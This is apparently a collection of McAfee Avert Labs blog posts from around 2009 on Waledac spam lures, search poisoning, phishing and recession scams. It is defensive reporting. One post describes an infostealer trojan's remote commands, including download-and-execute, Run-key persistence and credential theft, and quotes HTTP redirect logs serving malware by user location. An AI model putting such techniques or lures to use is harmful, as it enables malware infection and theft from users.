McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspicious users to follow their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.   Shortly thereafter it appeared that Google took action against that attack.  In deed a Google spokesperson confirmed that idea.

Today, Brian Krebs blogged on a separate story, but mentioned that while searching for a related term (pifts.exe), Google returned a poisoned link high on the results list.  After doing a little searching I discovered that the relevant term did seem to appear on Google’s top 100 search terms for a brief period.  However, the other terms I checked on Google Trends did not yield high ranked poisoned links as before.  But, I did come across a potential source for the page rank manipulation aspects of these attacks;  www.democrats.org, which is “Paid for by the Democratic National Committee “, and linked to from www.barackobama.com.

It turns out that this high-ranking website has a community blog feature that allows anyone to create a blog and post whatever they want.  Attackers have flooded this forum with bogus posts and thousands of links for more than a month.

Blog spam such as this is not anything new.  However, this highlights one significant effect of such spam and underlines the cause and effect relationship of security on the web.

Web searches are immensely useful and quite powerful.
Web 2.0, where a community of users contributes content for the betterment of the community can be a great thing.
But combined, a bad apple (or thousands) doesn’t just hurt the community; it can hurt a significant portion of the Web itself.

The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

Replica-watch spam has taken over the number one position for holiday spam.

Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

Putting a dollar value on productivity lost due to spam.

The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

As the tradition of Valentine’s Day approaches, so does another tradition: Valentine’s Day-themed spam that leads to malware. At McAfee Avert Labs we think everyone by now should know not to click on unlikely links to “love letters” and similar attractions. But we go on doing so. I guess love really does make us blind.  

By looking at the number of times we see the word valentine in spam, we can see how the spammers pump up the volume in the run-up to February 14. The following graph shows results for the month of January.

The current wave of Valentine’s Day spam contains links to domains that carry the Waledac Trojan. We are currently monitoring about 100 of these infected domains. Each of the domains is fast-fluxed, so there are hundreds of nameservers and thousands of IP addresses involved. (For more on Waledac, see the recent post from my colleague François Paget.)

Many of the Waledac techniques and features are very similar to those of the well-known Nuwar/Storm Trojan. At this time last year Nuwar was pumping out Valentine’s spam that looked like this:

And today Waledac spam looks like this:

Subjects such as “Deeply in love with you,” “I Knew I Loved You,” and “I Love Being In Love With You,” followed by a short URL in the body are typical of these attempts, which point to sites that offer a little Valentine’s malware. By all means send love notes to your honey before and on Valentine’s Day, but don’t fall for these transparent, annual attempts that lead only to tears.   

(Thanks to my colleagues Kevin McGhee and Dmitry Gryaznov for their contributions.)

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

For those who think the holidays always start too early, guess what? It is time to get your Valentine’s on. Well, at least spammers think so. Avert Labs started seeing Valentine enticing spam on January 22, and it has been increasing steadily since. Currently we are tracking Valentine’s spam to be between 1 percent and 2 percent of the total email sent on a daily basis.

Typical subjects we are seeing include “Deeply in love with you,” “I knew I loved you,” and “I love being with you.” A sample email of the “Only you in my heart” spam is shown below.

Once the reader opens the email a URL is available to click on. It’s not surprising that the URL points to a site that contains malware. The display seen below entices the viewer to click on one of the hearts. The binary file meandyou.exe is downloaded if a heart is selected.

Spurred on by this new outbreak of Valentine’s spam, overall spam volumes continue to climb back to pre-McColo takedown levels. Spam in January of this year is within 10 percent of spam from last January, and within the last few days spam is within 20 percent of pre-takedown levels. Spam reached record highs last March and with spammers getting back online and the lure of love in the air, it may be a just matter of time until new record levels are set.

Late last year, my sister forwarded to me an email that foretold of great evil and destruction should anyone open an email with a “Happy New Year” greeting for a subject. The email begged us to save the world by forwarding it to everyone we know. She wanted to know if she should believe it.

More recently I got something similar, this one warning that a deadly email will have a subject concerning President Barack Obama’s acceptance speech. This one added an air of authenticity by claiming that a popular hoax-tracking site has verified the details to be true. Hoax or not, I rarely read past the subject line of these types of emails, and I never forward them to others. Here are my reasons why:

• Thousands of mass-mailing worms have been discovered, and new ones are found every day. Each one carries multiple variants of the email it sends out. I would never remember every subject and message that I need to avoid.
• Verifying the veracity of a virus warning doesn’t do you any good. Say you have an email that warns you not to open an attachment if the subject is “blahblah”, and the attachment name is “blah.exe.” Then everyone declares this email a hoax, not real, nothing to worry about. Does that mean if you do receive an email that matches the description of the “hoax,” that it’s safe to open? Of course not! This is exactly what happened with the AOL4FREE hoax. It started out as a hoax, then someone had the bright idea of using the information from that hoax to send out a real Trojan horse.
• There’s already too much spam going around. 
• Security is a lucrative business, and players in this industry are just as publicity-hungry as any. If a virus was a real and significant threat, you’ll find your friendly neighborhood security expert in every media outlet talking about it. So just watch or read the news.
• Every holiday or significant world event is inevitably followed by emails containing a message about that event and carrying a nasty payload. Everyone should learn to expect this already. It’s called social engineering.
• Rather than reading through all the virus warnings, it’s easier and much more effective to to keep in mind a fixed list of simple tips.

Valentine’s day is coming up. You don’t need a friend of a friend to warn you that pretty soon you’ll be getting a suspicious email love letter.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

The codec download site, which is in Latvia, also hosts a number of related sites:

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing

Anybody suffering deja-vous? “/in.cgi should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activities. Various Morocco hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

On the defaced page, one attacker–whose email address is m0×0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

Speaking with the discoverers of this identity theft attempt and looking at the code, I noted the stolen data were sent to the same m0×0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As result of some searches I made today, I would not be surprised if this second guy (if it is not the same as the first) was also involved in some fake auction operations.

Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

Today a new downloader trojan is being spammed widely. This spam message arrives as a reply to the victim’s query of asking for the wire transfer.

When users run the file “bank_statement.scr” in the attachment zip file, it downloads the BackDoor-DSG trojan, while in the background it downloads an innocent pdf document from a legit site and opens it for deception. The pdf document, however, is not relevant to the wire transfer.

We see that the trojan file is repacked for each message, thus none of them are identical. In addition to that, this time the malware authors are changing resource sections in those pe files such as Icons, and file properties.

For example, we observed following icons:

Other resources:

File Descrption:

• Auto-reader Module
• Reader_Module
• Adobe Reader HSMC
• Adodb_SSL_reader

Translation:

• English
• Spanish
• Korean

CompanyName:

• Adobe
• ADOBE

These crafted resources, as well as the malicious code, are the result of server-side polymorphism to attempt to evade detections by Anti-Virus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr trojan, and dropped files as BackDoor-DSG with DAT 5474 or later.

From fake online banking to regionally targeted celeb porn – that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started to promote a fake “Bank of America” web site, announcing a change of the online banking’s interface to its “customers.” For these “customers” to be able to have a quick look at the “demo” page, a preview link is provided as shown in the sample spam mail:

Innocent users that follow the lure by clicking the link are presented a fake banking web site which uses the well known missing-codec-trick that is used to convince users into downloading an additional component for a website or video to work. This time it is an apparent update for “Adobe Flash Player” which they require you to install for their “demo page” to work. The update of course isn’t any legit software but a trojan instead.

We have taken a concise look under the trojan’s hood – it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and in the end may either be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed – the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among this private information are POP3, IMAP and FTP server credentials but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan moreover is capable of receiving and executing commands from the malicious host that it phones home to, so the malware’s behavior may change and “improve” anytime.

The list of commands currently understood by this variant of the trojan is as follows:

• “VER” – sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
• “EXE” – updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
• “DL” – downloads an executable from the Internet (but doesn’t run it)
• “DL_EXE” – downloads and runs an executable from the Internet
• “DL_EXE_ST” – downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
• “REBOOT” – forces the computer to reboot

An additional spam run targeting Swiss Internet users has been reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German language, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link contained in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celeb page are told to not work without a codec – too bad! This time the user is bribed with a high definition video plugin named “Adobe Player HD plugin”. Again, this of course isn’t a missing codec but rather a trojan aimed at downloading further malware. Noteworthy about this downloader is it’s contacting a web server with a traffic management system installed – contextual to the user’s Geo-Location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

By comparing the malware currently spread by the malicious host, Swiss residents are delivered a variant of the same “Infostealer” family as seen in the “Bank of America” spam campaign shown above. Users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, and information being stolen on computers of victims from another country.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”, additional coverage is in the 5461 DATs.

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today, you’re likely to look at someone who’s never been on the Internet as an alien life form, many new users are surprisingly logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has shown to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complains received, the typical kind of scam that would give your common sense a chance to flex – Nigerian 419 scams – represented only a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email based scams, and seeks to illicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit crimes of identity theft. Phishing is a smoke and mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes consisted of over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 

Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.

Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix to avoid filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.

Multiple SIgn-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.

Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.

Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.

Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.

In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that don’t do much to them more resilient. None of these techniques will necessarily have any affect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mockup site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

Following the recent release of this year’s McAfee Virtual Criminology Report, I had the opportunity to talk with diverse European journalists. They asked me for some concrete examples of the malicious Internet “offers” that the economic crisis has produced.

Fake working-at-home opportunities
The most visible offers are not new; they are only more numerous. They involve fake recruitment sites proposing working at home, which promises to be well paid and less time consuming than an office job. In fact, these are offers for mule jobs, like the one I described last year.

No doubt these offers attract all types; but when it becomes hard to find a job, the offer can also appeal to honest people.

Fake banking services
Less well known and increasing, fake bank sites flourish over the ‘Net. These are not mirror sites used in phishing attacks; these sites are created solely to attract people searching for a financial institution that can help. When an authentic bank denies a loan, for example, what could be more natural than to search for a more welcoming business.

The next screen captures offer examples of two live websites among the 20 or so I discovered last week.

�

Fake investment firms
As we watch our investments decline in value, many of us are on the lookout for a high return. Would you welcome an 850 percent profit guaranteed within 24 hours?
 

These investments are beneficial–at least for the crooks who promote them. With scams like these, it’s not necessary to catch people by the hundreds to make a nice sum of money. But if you invest here, you’ll never again see your tied-up capital.

Fake legal services
Cybercriminals know the economic downturn can lead to more people going to court after a dispute with a banker or employer. Watch out for dubious legal offers.
 

Here, too, the “service” will ask you for a cash advance before starting the job, one which will never be honored.

In searching for scam sites I have found many other ripoffs, but I hope you are already convinced: Taking advantage of people who are already victims of financial problems is truly scandalous. Yet this is a reminder, as if proof were still necessary, that today’s crooks have no misgivings about abusing the most vulnerable among us.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

